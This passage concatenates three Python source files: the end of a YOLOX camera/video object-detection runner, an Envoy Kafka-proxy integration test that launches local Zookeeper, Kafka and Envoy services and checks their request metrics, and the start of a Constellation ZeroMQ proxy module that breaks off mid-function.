self.__exp.test_conf = self.__conf
self.__exp.nmsthre = self.__nms
self.__exp.test_size = (self.__tsize, self.__tsize)
self.__exp.num_classes = len(self.__class_names)
self.__model = self.__exp.get_model()
if self.__auto_choose_device:
if torch.cuda.is_available():
self.__cuda()
else:
self.__cpu()
else:
if self.__device == 'cpu':
self.__cpu()
elif torch.cuda.is_available():
self.__cuda()
else:
print('cuda is not available, use cpu')
self.__cpu()
trt_file = None
decoder = None
if not self.__useTRT:
# 载入权重
pt = torch.load(self.__model_path, map_location="cpu")
# for name in pt:
# print(name)
pt['classes'] = self.__class_names
self.__model.load_state_dict(pt["model"])
if self.__fuse:
self.__model = fuse_model(self.__model)
else:
trt_file = self.__model_path
self.__model.head.decode_in_inference = False
decoder = self.__model.head.decode_outputs
# 预测器
self.__detector = Predictor(
self.__model,
self.__exp,
self.__class_names,
trt_file,
decoder,
self.__device,
self.__fp16,
self.__legacy,
)
def predict(self, image):
if self.__detector is None:
self.loadModel()
# 预测
image_use = image.copy()
self.__result = self.__detector.inference(image_use)
return self.__result
file_settings = None
if os.path.isfile('./detect_settings.yaml'):
file_settings = yaml.load(open('./detect_settings.yaml'), yaml.Loader)
confidence_thres = file_settings['confidence_thres'] if file_settings is not None else 0.4
nms_thres = file_settings['nms_thres'] if file_settings is not None else 0.5
device = file_settings['device'] if file_settings is not None else 'gpu'
input_size = file_settings['input_size'] if file_settings is not None else 640
auto_choose_device = file_settings['auto_choose_device'] if file_settings is not None else True
weight_size = file_settings['weight_size'] if file_settings is not None else 's'
model_path = file_settings['model_path'] if file_settings is not None else './best.pth'
is_trt_file = file_settings['is_trt_file'] if file_settings is not None else False
fp16 = file_settings['fp16'] if file_settings is not None else False
classes_file = file_settings['classes_file'] if file_settings is not None else 'coco_classes.txt'
source = file_settings['source'] if file_settings is not None else 0
source_type = file_settings['source_type'] if file_settings is not None else 'cam'
save_image = file_settings['save_image'] if file_settings is not None else False
show_image = file_settings['show_image'] if file_settings is not None else True
start_with_pause = int(file_settings['start_with_pause'] if file_settings is not None else False)
parse = make_parser().parse_args()
source = int(parse.source) if parse.source.isdigit() else parse.source
source_type = parse.source_type
start_with_pause = parse.pause
# print(parse)
def detect(my_dict):
from time import time
weight_type = weight_size
detector = Detector(
model_path=model_path,
model_size=weight_type,
class_path=classes_file,
conf=confidence_thres,
nms=nms_thres,
autoChooseDevice=auto_choose_device
)
"""
Before running loadModel, you can change params by using the following functions.
You can also create a Detector without any params like this:
detector = Detector()
and then input params by using these functions.
"""
# detector.setConf(0.4)
# detector.setNms(0.5)
detector.setDevice(device)
detector.setTsize(input_size)
detector.setUseTRT(is_trt_file)
detector.setFp16(fp16)
# detector.setAutoChooseDevice(True)
# detector.setModelPath('weights/yolox_s.pth')
"""
Then load model, it will take some time, Never forget this step!!!
"""
detector.loadModel()
"""
Start Detection
"""
my_dict['classes'] = detector.get_all_classes()
my_dict['run'] = True
while my_dict['run']: # 如果程序仍需要运行
if my_dict['updated']: # 如果图像已经更新
img = my_dict['img'] # 获取图像
my_dict['updated'] = False # 设置图像状态为未更新
t0 = time() # 开始计时
result = detector.predict(img) # 推理
my_dict['pre_fps'] = 1. / (time() - t0) # 结束计时并计算FPS
my_dict['result'] = result # 存储结果
my_dict['update_result'] = True # 设置结果状态为已更新
def show(my_dict):
from time import time, strftime, localtime
if source_type in ['cam', 'vid']:
cam = cv2.VideoCapture(source)
elif source_type in ['image_dir', 'image']:
cam = DirCapture(str(source))
else:
print('wrong source type')
cam = DirCapture()
fpss = []
result = []
time_delay = 1 - start_with_pause
print('wait for model-loading')
while not my_dict['run']:
pass
t0 = time()
while cam.isOpened():
t1 = time()
success, frame = cam.read()
if success:
# frame = cv2.resize(frame, (210 * 6, 90 * 6))
my_dict['img'] = frame
my_dict['updated'] = True
fpss.append((1 / (time() - t0)))
if len(fpss) > 10:
fpss = fpss[1:]
now_mean_fps = sum(fpss) / len(fpss)
print('\r播放帧率=%.2fFPS, 推理帧率=%.2fFPS' % (now_mean_fps, my_dict['pre_fps']), end='')
t0 = time()
if my_dict['update_result']:
result = my_dict['result']
my_dict['update_result'] = False
if len(result):
draw_bb(frame, result, my_dict['classes'])
if save_image:
img_name = strftime("%Y_%m_%d_%H_%M_%S.jpg", localtime())
cv2.imwrite(img_name, frame)
cv2.imshow('yolox detect', frame) if show_image else None
key = cv2.waitKey(time_delay)
if key == 27:
cv2.destroyAllWindows()
break
elif key == ord(' '):
time_delay = 1 - time_delay
else:
break
while not time() - t1 >= 0.03:
pass
print('')
my_dict['run'] = False
cv2.destroyAllWindows()
def single():
import time
weight_type = weight_size
detector = Detector(
model_path=model_path,
model_size=weight_type,
class_path=classes_file,
conf=confidence_thres,
nms=nms_thres,
autoChooseDevice=auto_choose_device
)
detector.setDevice(device)
detector.setTsize(input_size)
detector.setUseTRT(is_trt_file)
detector.setFp16(fp16)
detector.loadModel()
#########################################################################################################
if source_type in ['cam', 'vid']:
cap = cv2.VideoCapture(source)
elif source_type in ['image_dir', 'image']:
cap = DirCapture(str(source))
else:
print('wrong source type')
cap = DirCapture()
#########################################################################################################
t0 = time.time()
wait_time = 1 - start_with_pause
while cap.isOpened():
ret, frame = cap.read()
if ret:
t1 = time.time()
frame = cv2.resize(frame, (1920 + 1280, 1080 + 720))
results = detector.predict(frame)
draw_bb(frame, results, detector.get_all_classes())
print('\r播放帧率=%.2fFPS, 推理帧率=%.2fFPS' % ((1 / (time.time() - t0)), (1 / (time.time() - t1))), end='')
t0 = time.time()
if show_image:
cv2.imshow('results', frame)
if save_image:
img_name = time.strftime("%Y_%m_%d_%H_%M_%S.jpg", time.localtime())
cv2.imwrite(img_name, frame)
key = cv2.waitKey(wait_time)
if key == 27:
cap.release()
cv2.destroyAllWindows()
break
elif key == ord(' '):
wait_time = 1 - wait_time
print('')
def multy():
print('starting multiprocess')
from multiprocessing import Process, Manager, freeze_support
freeze_support()
d = Manager().dict()
d['run'] = False
d['updated'] = False
d['img'] = None
d['result'] = []
d['pre_fps'] = 0
d['classes'] = []
d['update_result'] = False
processes = [Process(target=show, args=(d,)),
Process(target=detect, args=(d,))]
[process.start() for process in processes]
[process.join() for process in processes]
if __name__ == '__main__':
multy() if parse.multi else single()
|
kafka_broker_integration_test.py
|
#!/usr/bin/python
import random
import os
import shutil
import socket
import subprocess
import tempfile
from threading import Thread, Semaphore
import time
import unittest
from kafka import KafkaAdminClient, KafkaConsumer, KafkaProducer, TopicPartition
from kafka.admin import ConfigResource, ConfigResourceType, NewPartitions, NewTopic
import urllib.request
class KafkaBrokerIntegrationTest(unittest.TestCase):
"""
All tests in this class depend on Envoy/Zookeeper/Kafka running.
For each of these tests we are going to create Kafka consumers/producers/admins and point them
to Envoy (that proxies Kafka).
We expect every operation to succeed (as they should reach Kafka) and the corresponding metrics
to increase on Envoy side (to show that messages were received and forwarded successfully).
"""
services = None
@classmethod
def setUpClass(cls):
KafkaBrokerIntegrationTest.services = ServicesHolder()
KafkaBrokerIntegrationTest.services.start()
@classmethod
def tearDownClass(cls):
KafkaBrokerIntegrationTest.services.shut_down()
def setUp(self):
# We want to check if our services are okay before running any kind of test.
KafkaBrokerIntegrationTest.services.check_state()
self.metrics = MetricsHolder(self)
def tearDown(self):
# We want to check if our services are okay after running any test.
KafkaBrokerIntegrationTest.services.check_state()
@classmethod
def kafka_address(cls):
return '127.0.0.1:%s' % KafkaBrokerIntegrationTest.services.kafka_envoy_port
@classmethod
def envoy_stats_address(cls):
return 'http://127.0.0.1:%s/stats' % KafkaBrokerIntegrationTest.services.envoy_monitoring_port
def test_kafka_consumer_with_no_messages_received(self):
"""
This test verifies that consumer sends fetches correctly, and receives nothing.
"""
consumer = KafkaConsumer(bootstrap_servers=KafkaBrokerIntegrationTest.kafka_address(),
fetch_max_wait_ms=500)
consumer.assign([TopicPartition('test_kafka_consumer_with_no_messages_received', 0)])
for _ in range(10):
records = consumer.poll(timeout_ms=1000)
self.assertEqual(len(records), 0)
self.metrics.collect_final_metrics()
# 'consumer.poll()' can translate into 0 or more fetch requests.
# We have set API timeout to 1000ms, while fetch_max_wait is 500ms.
# This means that consumer will send roughly 2 (1000/500) requests per API call (so 20 total).
# So increase of 10 (half of that value) should be safe enough to test.
self.metrics.assert_metric_increase('fetch', 10)
# Metadata is used by consumer to figure out current partition leader.
self.metrics.assert_metric_increase('metadata', 1)
def test_kafka_producer_and_consumer(self):
"""
This test verifies that producer can send messages, and consumer can receive them.
"""
messages_to_send = 100
partition = TopicPartition('test_kafka_producer_and_consumer', 0)
producer = KafkaProducer(bootstrap_servers=KafkaBrokerIntegrationTest.kafka_address())
for _ in range(messages_to_send):
future = producer.send(value=b'some_message_bytes',
topic=partition.topic,
partition=partition.partition)
send_status = future.get()
self.assertTrue(send_status.offset >= 0)
consumer = KafkaConsumer(bootstrap_servers=KafkaBrokerIntegrationTest.kafka_address(),
auto_offset_reset='earliest',
fetch_max_bytes=100)
consumer.assign([partition])
received_messages = []
while (len(received_messages) < messages_to_send):
poll_result = consumer.poll(timeout_ms=1000)
received_messages += poll_result[partition]
self.metrics.collect_final_metrics()
self.metrics.assert_metric_increase('metadata', 2)
self.metrics.assert_metric_increase('produce', 100)
# 'fetch_max_bytes' was set to a very low value, so client will need to send a FetchRequest
# multiple times to broker to get all 100 messages (otherwise all 100 records could have been
# received in one go).
self.metrics.assert_metric_increase('fetch', 20)
# Both producer & consumer had to fetch cluster metadata.
self.metrics.assert_metric_increase('metadata', 2)
def test_consumer_with_consumer_groups(self):
"""
This test verifies that multiple consumers can form a Kafka consumer group.
"""
consumer_count = 10
consumers = []
for id in range(consumer_count):
consumer = KafkaConsumer(bootstrap_servers=KafkaBrokerIntegrationTest.kafka_address(),
group_id='test',
client_id='test-%s' % id)
consumer.subscribe(['test_consumer_with_consumer_groups'])
consumers.append(consumer)
worker_threads = []
for consumer in consumers:
thread = Thread(target=KafkaBrokerIntegrationTest.worker, args=(consumer,))
thread.start()
worker_threads.append(thread)
for thread in worker_threads:
thread.join()
for consumer in consumers:
consumer.close()
self.metrics.collect_final_metrics()
self.metrics.assert_metric_increase('api_versions', consumer_count)
self.metrics.assert_metric_increase('metadata', consumer_count)
self.metrics.assert_metric_increase('join_group', consumer_count)
self.metrics.assert_metric_increase('find_coordinator', consumer_count)
self.metrics.assert_metric_increase('leave_group', consumer_count)
@staticmethod
def worker(consumer):
"""
Worker thread for Kafka consumer.
Multiple poll-s are done here, so that the group can safely form.
"""
poll_operations = 10
for i in range(poll_operations):
consumer.poll(timeout_ms=1000)
def test_admin_client(self):
"""
This test verifies that Kafka Admin Client can still be used to manage Kafka.
"""
admin_client = KafkaAdminClient(bootstrap_servers=KafkaBrokerIntegrationTest.kafka_address())
# Create a topic with 3 partitions.
new_topic_spec = NewTopic(name='test_admin_client', num_partitions=3, replication_factor=1)
create_response = admin_client.create_topics([new_topic_spec])
error_data = create_response.topic_errors
self.assertEqual(len(error_data), 1)
self.assertEqual(error_data[0], (new_topic_spec.name, 0, None))
# Alter topic (change some Kafka-level property).
config_resource = ConfigResource(ConfigResourceType.TOPIC, new_topic_spec.name,
{'flush.messages': 42})
alter_response = admin_client.alter_configs([config_resource])
error_data = alter_response.resources
self.assertEqual(len(error_data), 1)
self.assertEqual(error_data[0][0], 0)
# Add 2 more partitions to topic.
new_partitions_spec = {new_topic_spec.name: NewPartitions(5)}
new_partitions_response = admin_client.create_partitions(new_partitions_spec)
error_data = create_response.topic_errors
self.assertEqual(len(error_data), 1)
self.assertEqual(error_data[0], (new_topic_spec.name, 0, None))
# Delete a topic.
delete_response = admin_client.delete_topics([new_topic_spec.name])
error_data = create_response.topic_errors
self.assertEqual(len(error_data), 1)
self.assertEqual(error_data[0], (new_topic_spec.name, 0, None))
self.metrics.collect_final_metrics()
self.metrics.assert_metric_increase('create_topics', 1)
self.metrics.assert_metric_increase('alter_configs', 1)
self.metrics.assert_metric_increase('create_partitions', 1)
self.metrics.assert_metric_increase('delete_topics', 1)
class MetricsHolder:
"""
Utility for storing Envoy metrics.
Expected to be created before the test (to get initial metrics), and then to collect them at the
end of test, so the expected increases can be verified.
"""
def __init__(self, owner):
self.owner = owner
self.initial_requests, self.inital_responses = MetricsHolder.get_envoy_stats()
self.final_requests = None
self.final_responses = None
def collect_final_metrics(self):
self.final_requests, self.final_responses = MetricsHolder.get_envoy_stats()
def assert_metric_increase(self, message_type, count):
request_type = message_type + '_request'
response_type = message_type + '_response'
initial_request_value = self.initial_requests.get(request_type, 0)
final_request_value = self.final_requests.get(request_type, 0)
self.owner.assertGreaterEqual(final_request_value, initial_request_value + count)
initial_response_value = self.inital_responses.get(response_type, 0)
final_response_value = self.final_responses.get(response_type, 0)
self.owner.assertGreaterEqual(final_response_value, initial_response_value + count)
@staticmethod
def get_envoy_stats():
"""
Grab request/response metrics from envoy's stats interface.
"""
stats_url = KafkaBrokerIntegrationTest.envoy_stats_address()
requests = {}
responses = {}
with urllib.request.urlopen(stats_url) as remote_metrics_url:
payload = remote_metrics_url.read().decode()
lines = payload.splitlines()
for line in lines:
request_prefix = 'kafka.testfilter.request.'
response_prefix = 'kafka.testfilter.response.'
if line.startswith(request_prefix):
data = line[len(request_prefix):].split(': ')
requests[data[0]] = int(data[1])
pass
if line.startswith(response_prefix) and '_response:' in line:
data = line[len(response_prefix):].split(': ')
responses[data[0]] = int(data[1])
return [requests, responses]
class ServicesHolder:
"""
Utility class for setting up our external dependencies: Envoy, Zookeeper & Kafka.
"""
def __init__(self):
self.kafka_tmp_dir = None
self.envoy_worker = None
self.zk_worker = None
self.kafka_worker = None
@staticmethod
def get_random_listener_port():
"""
Here we count on OS to give us some random socket.
Obviously this method will need to be invoked in a try loop anyways, as in degenerate scenario
someone else might have bound to it after we had closed the socket and before the service
that's supposed to use it binds to it.
"""
import socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:
server_socket.bind(('0.0.0.0', 0))
socket_port = server_socket.getsockname()[1]
print('returning %s' % socket_port)
return socket_port
def start(self):
"""
Starts all the services we need for integration tests.
"""
# Find java installation that we are going to use to start Zookeeper & Kafka.
java_directory = ServicesHolder.find_java()
launcher_environment = os.environ.copy()
# Make `java` visible to build script:
# https://github.com/apache/kafka/blob/2.2.0/bin/kafka-run-class.sh#L226
new_path = os.path.abspath(java_directory) + os.pathsep + launcher_environment['PATH']
launcher_environment['PATH'] = new_path
# Both ZK & Kafka use Kafka launcher script.
# By default it sets up JMX options:
# https://github.com/apache/kafka/blob/2.2.0/bin/kafka-run-class.sh#L167
# But that forces the JVM to load file that is not present due to:
# https://docs.oracle.com/javase/9/management/monitoring-and-management-using-jmx-technology.htm
# Let's make it simple and just disable JMX.
launcher_environment['KAFKA_JMX_OPTS'] = ' '
# Setup a temporary directory, which will be used by Kafka & Zookeeper servers.
self.kafka_tmp_dir = tempfile.mkdtemp()
print('Temporary directory used for tests: ' + self.kafka_tmp_dir)
# This directory will store the configuration files fed to services.
config_dir = self.kafka_tmp_dir + '/config'
os.mkdir(config_dir)
# This directory will store Zookeeper's data (== Kafka server metadata).
zookeeper_store_dir = self.kafka_tmp_dir + '/zookeeper_data'
os.mkdir(zookeeper_store_dir)
# This directory will store Kafka's data (== partitions).
kafka_store_dir = self.kafka_tmp_dir + '/kafka_data'
os.mkdir(kafka_store_dir)
# Find the Kafka server 'bin' directory.
kafka_bin_dir = os.path.join('.', 'external', 'kafka_server_binary', 'bin')
# Main initialization block:
# - generate random ports,
# - render configuration with these ports,
# - start services and check if they are running okay,
# - if anything is having problems, kill everything and start again.
while True:
# Generate random ports.
zk_port = ServicesHolder.get_random_listener_port()
kafka_real_port = ServicesHolder.get_random_listener_port()
kafka_envoy_port = ServicesHolder.get_random_listener_port()
envoy_monitoring_port = ServicesHolder.get_random_listener_port()
# These ports need to be exposed to tests.
self.kafka_envoy_port = kafka_envoy_port
self.envoy_monitoring_port = envoy_monitoring_port
# Render config file for Envoy.
template = RenderingHelper.get_template('envoy_config_yaml.j2')
contents = template.render(
data={
'kafka_real_port': kafka_real_port,
'kafka_envoy_port': kafka_envoy_port,
'envoy_monitoring_port': envoy_monitoring_port
})
envoy_config_file = os.path.join(config_dir, 'envoy_config.yaml')
with open(envoy_config_file, 'w') as fd:
fd.write(contents)
print('Envoy config file rendered at: ' + envoy_config_file)
# Render config file for Zookeeper.
template = RenderingHelper.get_template('zookeeper_properties.j2')
contents = template.render(data={'data_dir': zookeeper_store_dir, 'zk_port': zk_port})
zookeeper_config_file = os.path.join(config_dir, 'zookeeper.properties')
with open(zookeeper_config_file, 'w') as fd:
fd.write(contents)
print('Zookeeper config file rendered at: ' + zookeeper_config_file)
# Render config file for Kafka.
template = RenderingHelper.get_template('kafka_server_properties.j2')
contents = template.render(
data={
'data_dir': kafka_store_dir,
'zk_port': zk_port,
'kafka_real_port': kafka_real_port,
'kafka_envoy_port': kafka_envoy_port
})
kafka_config_file = os.path.join(config_dir, 'kafka_server.properties')
with open(kafka_config_file, 'w') as fd:
fd.write(contents)
print('Kafka config file rendered at: ' + kafka_config_file)
# Start the services now.
try:
# Start Envoy in the background, pointing to rendered config file.
envoy_binary = ServicesHolder.find_envoy()
# --base-id is added to allow multiple Envoy instances to run at the same time.
envoy_args = [
os.path.abspath(envoy_binary), '-c', envoy_config_file, '--base-id',
str(random.randint(1, 999999))
]
envoy_handle = subprocess.Popen(envoy_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.envoy_worker = ProcessWorker(envoy_handle, 'Envoy', 'starting main dispatch loop')
self.envoy_worker.await_startup()
# Start Zookeeper in background, pointing to rendered config file.
zk_binary = os.path.join(kafka_bin_dir, 'zookeeper-server-start.sh')
zk_args = [os.path.abspath(zk_binary), zookeeper_config_file]
zk_handle = subprocess.Popen(zk_args,
env=launcher_environment,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.zk_worker = ProcessWorker(zk_handle, 'Zookeeper', 'binding to port')
self.zk_worker.await_startup()
# Start Kafka in background, pointing to rendered config file.
kafka_binary = os.path.join(kafka_bin_dir, 'kafka-server-start.sh')
kafka_args = [os.path.abspath(kafka_binary), kafka_config_file]
kafka_handle = subprocess.Popen(kafka_args,
env=launcher_environment,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.kafka_worker = ProcessWorker(kafka_handle, 'Kafka', '[KafkaServer id=0] started')
self.kafka_worker.await_startup()
# All services have started without problems - now we can finally finish.
break
except Exception as e:
print('Could not start services, will try again', e)
if self.kafka_worker:
self.kafka_worker.kill()
self.kafka_worker = None
if self.zk_worker:
self.zk_worker.kill()
self.zk_worker = None
if self.envoy_worker:
self.envoy_worker.kill()
self.envoy_worker = None
@staticmethod
def find_java():
"""
This method just locates the Java installation in current directory.
We cannot hardcode the name, as the dirname changes as per:
https://github.com/bazelbuild/bazel/blob/master/tools/jdk/BUILD#L491
"""
external_dir = os.path.join('.', 'external')
for directory in os.listdir(external_dir):
if 'remotejdk11' in directory:
result = os.path.join(external_dir, directory, 'bin')
print('Using Java: ' + result)
return result
raise Exception('Could not find Java in: ' + external_dir)
@staticmethod
def find_envoy():
"""
This method locates envoy binary.
It's present at ./source/exe/envoy-static (at least for mac/bazel-asan/bazel-tsan),
or at ./external/envoy/source/exe/envoy-static (for bazel-compile_time_options).
"""
candidate = os.path.join('.', 'source', 'exe', 'envoy-static')
if os.path.isfile(candidate):
return candidate
candidate = os.path.join('.', 'external', 'envoy', 'source', 'exe', 'envoy-static')
if os.path.isfile(candidate):
return candidate
raise Exception("Could not find Envoy")
def shut_down(self):
# Teardown - kill Kafka, Zookeeper, and Envoy. Then delete their data directory.
print('Cleaning up')
if self.kafka_worker:
self.kafka_worker.kill()
if self.zk_worker:
self.zk_worker.kill()
if self.envoy_worker:
self.envoy_worker.kill()
if self.kafka_tmp_dir:
print('Removing temporary directory: ' + self.kafka_tmp_dir)
shutil.rmtree(self.kafka_tmp_dir)
def check_state(self):
self.envoy_worker.check_state()
self.zk_worker.check_state()
self.kafka_worker.check_state()
class ProcessWorker:
"""
Helper class that wraps the external service process.
Provides ability to wait until service is ready to use (this is done by tracing logs) and
printing service's output to stdout.
"""
# Service is considered to be properly initialized after it has logged its startup message
# and has been alive for INITIALIZATION_WAIT_SECONDS after that message has been seen.
# This (clunky) design is needed because Zookeeper happens to log "binding to port" and then
# might fail to bind.
INITIALIZATION_WAIT_SECONDS = 3
def __init__(self, process_handle, name, startup_message):
# Handle to process and pretty name.
self.process_handle = process_handle
self.name = name
self.startup_message = startup_message
self.startup_message_ts = None
# Semaphore raised when startup has finished and information regarding startup's success.
self.initialization_semaphore = Semaphore(value=0)
self.initialization_ok = False
self.state_worker = Thread(target=ProcessWorker.initialization_worker, args=(self,))
self.state_worker.start()
self.out_worker = Thread(target=ProcessWorker.pipe_handler,
args=(self, self.process_handle.stdout, 'out'))
self.out_worker.start()
self.err_worker = Thread(target=ProcessWorker.pipe_handler,
args=(self, self.process_handle.stderr, 'err'))
self.err_worker.start()
@staticmethod
def initialization_worker(owner):
"""
Worker thread.
Responsible for detecting if service died during initialization steps and ensuring if enough
time has passed since the startup message has been seen.
When either of these happens, we just raise the initialization semaphore.
"""
while True:
status = owner.process_handle.poll()
if status:
# Service died.
print('%s did not initialize properly - finished with: %s' % (owner.name, status))
owner.initialization_ok = False
owner.initialization_semaphore.release()
break
else:
# Service is still running.
startup_message_ts = owner.startup_message_ts
if startup_message_ts:
# The log message has been registered (by pipe_handler thread), let's just ensure that
# some time has passed and mark the service as running.
current_time = int(round(time.time()))
if current_time - startup_message_ts >= ProcessWorker.INITIALIZATION_WAIT_SECONDS:
print('Startup message seen %s seconds ago, and service is still running' %
(ProcessWorker.INITIALIZATION_WAIT_SECONDS),
flush=True)
owner.initialization_ok = True
owner.initialization_semaphore.release()
break
time.sleep(1)
print('Initialization worker for %s has finished' % (owner.name))
@staticmethod
def pipe_handler(owner, pipe, pipe_name):
"""
Worker thread.
If a service startup message is seen, then it just registers the timestamp of its appearance.
Also prints every received message.
"""
try:
for raw_line in pipe:
line = raw_line.decode().rstrip()
print('%s(%s):' % (owner.name, pipe_name), line, flush=True)
if owner.startup_message in line:
print('%s initialization message [%s] has been logged' %
(owner.name, owner.startup_message))
owner.startup_message_ts = int(round(time.time()))
finally:
pipe.close()
print('Pipe handler for %s(%s) has finished' % (owner.name, pipe_name))
def await_startup(self):
"""
Awaits on initialization semaphore, and then verifies the initialization state.
If everything is okay, we just continue (we can use the service), otherwise throw.
"""
print('Waiting for %s to start...' % (self.name))
self.initialization_semaphore.acquire()
try:
if self.initialization_ok:
print('Service %s started successfully' % (self.name))
else:
raise Exception('%s could not start' % (self.name))
finally:
self.initialization_semaphore.release()
def check_state(self):
"""
Verifies if the service is still running. Throws if it is not.
"""
status = self.process_handle.poll()
if status:
raise Exception('%s died with: %s' % (self.name, str(status)))
def kill(self):
"""
Utility method to kill the main service thread and all related workers.
"""
print('Stopping service %s' % self.name)
# Kill the real process.
self.process_handle.kill()
self.process_handle.wait()
# The sub-workers are going to finish on their own, as they will detect main thread dying
# (through pipes closing, or .poll() returning a non-null value).
self.state_worker.join()
self.out_worker.join()
self.err_worker.join()
print('Service %s has been stopped' % self.name)
class RenderingHelper:
"""
Helper for jinja templates.
"""
@staticmethod
def get_template(template):
import jinja2
import os
import sys
# Templates are resolved relatively to main start script, due to main & test templates being
# stored in different directories.
env = jinja2.Environment(loader=jinja2.FileSystemLoader(
searchpath=os.path.dirname(os.path.abspath(__file__))))
return env.get_template(template)
if __name__ == '__main__':
unittest.main()
|
Constellation.py
|
# Constellation Python proxy
# Version: 1.8.0.16091 (31 Mar 2016)
# (c) 2015-2016 Sebastien.warin.fr
import inspect, json, sys, time, uuid, zmq
from collections import namedtuple
from enum import Enum
from threading import Thread
reload(sys)
sys.setdefaultencoding("utf-8")
class MessageScope(Enum):
none = 0
group = 1
package = 2
sentinel = 3
others = 4
all = 5
global IsRunning
global Settings
global OnExitCallback
global OnConnectionChanged
global OnLastStateObjectsReceived
global HasControlManager
global IsConnected
global IsStandAlone
global SentinelName
global PackageName
global PackageInstanceName
global PackageVersion
global PackageAssemblyVersion
global ConstellationClientVersion
global LastStateObjects
IsRunning = False
Settings = None
OnExitCallback = None
OnConnectionChanged = None
OnLastStateObjectsReceived = None
HasControlManager = None
IsConnected = None
IsStandAlone = None
SentinelName = None
PackageName = None
PackageInstanceName = None
PackageVersion = None
PackageAssemblyVersion = None
ConstellationClientVersion = None
LastStateObjects = None
_messageCallbacks = []
_stateObjectCallbacks = []
_messageCallbacksList = {}
_stateObjectCallbacksList = {}
_ctx = zmq.Context()
_socket = _ctx.socket(zmq.PAIR)
_socket.connect("tcp://127.0.0.1:" + str(int(sys.argv[1])))
time.sleep(1.0)
_poller = zmq.Poller()
_poller.register(_socket, zmq.POLLIN)
_socket.send_string("Init")
def ConvertJsonToObject(data, tupleName = 'X', onTupleCreated = None):
def _json_object_hook(d):
tuple = namedtuple(tupleName, d.keys())
if onTupleCreated:
onTupleCreated(tuple)
return tuple(*d.values())
return json.loads(json.dumps(data) if isinstance(data, dict) else data, object_hook=_json_object_hook)
def MessageCallback(key = None, isHidden = False, returnType = None):
def _registar(func):
_messageCallbacksList[func.__name__] = { 'Func': func, 'Key' : key, 'DeclareCallback' : not isHidden, 'ReturnType' : returnType }
return func
return _registar
def StateObjectLink(sentinel = '*', package = '*', name = '*', type ='*'):
def _registar(func):
_stateObjectCallbacksList[func.__name__] = { 'Func': func, 'Sentinel' : sentinel, 'Package' : package, 'Name' : name, 'Type' : type }
return func
return _registar
def DeclarePackageDescriptor():
_socket.send_json({ 'Function' : 'DeclarePackageDescriptor' })
def WriteInfo(msg):
WriteLog('Info', msg)
def WriteWarn(msg):
WriteLog('Warn', msg)
def WriteError(msg):
WriteLog('Error', msg)
def WriteLog(level, msg):
_socket.send_json({ 'Function' : 'WriteLog', 'Level' : level, 'Message' : str(msg).encode() })
def PushStateObject(name, value, type = "", metadatas = {}, lifetime = 0):
_socket.send_json({ 'Function' : 'PushStateObject', 'Name': str(name), 'Value': value, 'Type': str(type), 'Metadatas' : metadatas, 'Lifetime' : lifetime })
def SendMessage(to, key, value, scope = MessageScope.package):
_socket.send_json({ 'Function' : 'SendMessage', 'Scope': scope.value, 'To' : str(to), 'Key': str(key), 'Value' : value, 'SagaId' : '' })
def SendMessageWithSaga(callback, to, key, value, scope = MessageScope.package):
sagaId = str(uuid.uuid1())
def _msgCallback(k, context, data):
if(k == "__Response" and context.SagaId == sagaId):
if not data:
callback(context) if (callback.func_code.co_argcount > 0 and callback.func_code.co_varnames[callback.func_code.co_argcount - 1] == 'context') else callback()
else:
if isinstance(data, list):
if (callback.func_code.co_argcount > 0 and callback.func_code.co_varnames[callback.func_code.co_argcount - 1] == 'context'):
data.append(context)
callback(*data)
else:
callback(data, context) if (callback.func_code.co_argcount > 0 and callback.func_code.co_varnames[callback.func_code.co_argcount - 1] == 'context') else callback(data)
_messageCallbacks.remove(_msgCallback)
_messageCallbacks.append(_msgCallback)
_socket.send_json({ 'Function' : 'SendMessage', 'Scope': scope.value, 'To' : str(to), 'Key': str(key), 'Value' : value, 'SagaId' : sagaId })
def SubscribeMessages(group):
_socket.send_json({ 'Function' : 'SubscribeMessages', 'Group' : str(group) })
def UnSubscribeMessages(group):
_socket.send_json({ 'Function' : 'UnSubscribeMessages', 'Group' : str(group) })
def RefreshSettings():
_socket.send_json({ 'Function' : 'GetSettings' })
def RequestStateObjects(sentinel = '*', package = '*', name = '*', type ='*'):
_socket.send_json({ 'Function' : 'RequestStateObjects', 'Sentinel' : sentinel, 'Package' : package, 'Name' : name, 'Type' : type })
def SubscribeStateObjects(sentinel = '*', package = '*', name = '*', type ='*'):
_socket.send_json({ 'Function' : 'SubscribeStateObjects', 'Sentinel' : sentinel, 'Package' : package, 'Name' : name, 'Type' : type })
def PurgeStateObjects(name = '*', type ='*'):
_socket.send_json({ 'Function' : 'PurgeStateObjects', 'Name' : name, 'Type' : type })
def RegisterStateObjectLinks():
for key in _stateObjectCallbacksList:
soLink = _stateObjectCallbacksList[key]
RegisterStateObjectCallback(soLink['Func'], soLink['Sentinel'], soLink['Package'], soLink['Name'], soLink['Type'])
def RegisterStateObjectCallback(func, sentinel = '*', package = '*', name = '*', type ='*', request = True, subscribe = True):
def _soCallback(stateobject):
if((sentinel == stateobject.SentinelName or sentinel == '*') and (package == stateobject.PackageName or package == '*') and (name == stateobject.Name or name == '*') and (type == stateobject.Type or type == '*')):
func(stateobject)
_stateObjectCallbacks.append(_soCallback)
if request == True:
RequestStateObjects(sentinel, package, name, type)
if subscribe == True:
SubscribeStateObjects(sentinel, package, name, type)
def GetSetting(key):
if key in Settings:
return Settings[key]
else:
return None
def RegisterMessageCallbacks():
for key in _messageCallbacksList:
func = _messageCallbacksList[key]['Func']
RegisterMessageCallback(_messageCallbacksList[key]['Key'] if _messageCallbacksList[key]['Key'] else func.__name__, func, _messageCallbacksList[key]['DeclareCallback'], str(func.__doc__) if func.__doc__ else '', _messageCallbacksList[key]['ReturnType'])
def RegisterMessageCallback(key, func, declareCallback = False, description = '', returnType = None):
def _msgCallback(k, context, data):
if(k == key):
returnValue = None
if not data:
returnValue = func(context) if (func.func_code.co_argcount > 0 and func.func_code.co_varnames[func.func_code.co_argcount - 1] == 'context') else func()
else:
if isinstance(data, list):
if (func.func_code.co_argcount > 0 and func.func_code.co_varnames[func.func_code.co_argcount - 1] == 'context'):
data.append(context)
returnValue = func(*data)
else:
returnValue = func(data, context) if (func.func_code.co_argcount > 0 and func.func_code.co_varnames[func.func_code.co_argcount - 1] == 'context') else func(data)
if context.IsSaga and returnValue <> None:
SendResponse(context, returnValue)
